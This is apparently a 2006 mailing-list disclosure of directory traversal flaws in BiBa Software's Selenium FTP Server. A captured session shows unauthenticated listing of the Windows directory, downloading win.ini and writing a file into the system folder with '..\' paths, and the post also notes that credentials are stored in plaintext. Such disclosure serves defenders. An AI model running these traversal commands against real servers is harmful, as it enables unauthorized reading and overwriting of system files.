[exploits] BiBa Software Selenium FTP Vulnerabilities

Greg Linares glinares.code at gmail.com
Wed Nov 15 12:39:47 CST 2006 

Selenium FTP Server ( http://bibasoftware.com/?page_id=15 ) is
vulnerable to a directory transversal input validation error in which
a remote unauthenticated user can issue using the DIR, LIST,  NLST,
etc commands to display any file on the remote server or use the
GET/RECV command to retrieve any file outside the FTP root and the
PUT/SEND to write to any location on the remote server.

Here is a demonstration:

C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User  logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp        68096 May 02  2005 agrsmdel.exe
-rwxrwxrwx   1 ftp      ftp        44544 Jun 02  1998 clspack.exe
-rwxrwxrwx   1 ftp      ftp      1032192 Aug 04  2004 explorer.exe
-rwxrwxrwx   1 ftp      ftp        10752 May 26  2005 hh.exe
-rwxrwxrwx   1 ftp      ftp       306688 Oct 29  1998 IsUninst.exe
-rwxrwxrwx   1 ftp      ftp       112640 Jul 01  2001 lsb_un20.exe
-rwxrwxrwx   1 ftp      ftp        69120 Aug 04  2004 notepad.exe
-rwxrwxrwx   1 ftp      ftp        69120 Aug 04  2004 notepad1.exe
-rwxrwxrwx   1 ftp      ftp       146432 Aug 04  2004 regedit.exe
-rwxrwxrwx   1 ftp      ftp        46352 Feb 28  2003 setdebug.exe
-rwxrwxrwx   1 ftp      ftp       286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx   1 ftp      ftp        32866 Aug 04  2004 slrundll.exe
-rwxrwxrwx   1 ftp      ftp        46592 Aug 02  2002 SOUNDMAN.EXE
-rwxrwxrwx   1 ftp      ftp        73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx   1 ftp      ftp        15360 Aug 04  2004 taskman.exe
-rwxrwxrwx   1 ftp      ftp        90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx   1 ftp      ftp        49680 Aug 04  2004 twunk_16.exe
-rwxrwxrwx   1 ftp      ftp        25600 Aug 04  2004 twunk_32.exe
-rwxrwxrwx   1 ftp      ftp       299520 Mar 23  1999 uninst.exe
-rwxrwxrwx   1 ftp      ftp       107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx   1 ftp      ftp        86016 Dec 17  1999 unvise32.exe
-rwxrwxrwx   1 ftp      ftp       256192 Aug 04  2004 winhelp.exe
-rwxrwxrwx   1 ftp      ftp       283648 Aug 04  2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get ..\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for ..\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt ..\windows\toobad.txt
200 Port command successful.
150 Opening data connection for ..\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.

Furthermore the software improperly writes any username/password that
might be used to login to the program in plaintext to the file[s]
stored in the default directory of
C:\Program Files\BiBa SOFTWARE\Selenium Server\Servers

Thank you for time,
Greg Linares
GLinares.code at Gmail.com

More information about the exploits mailing list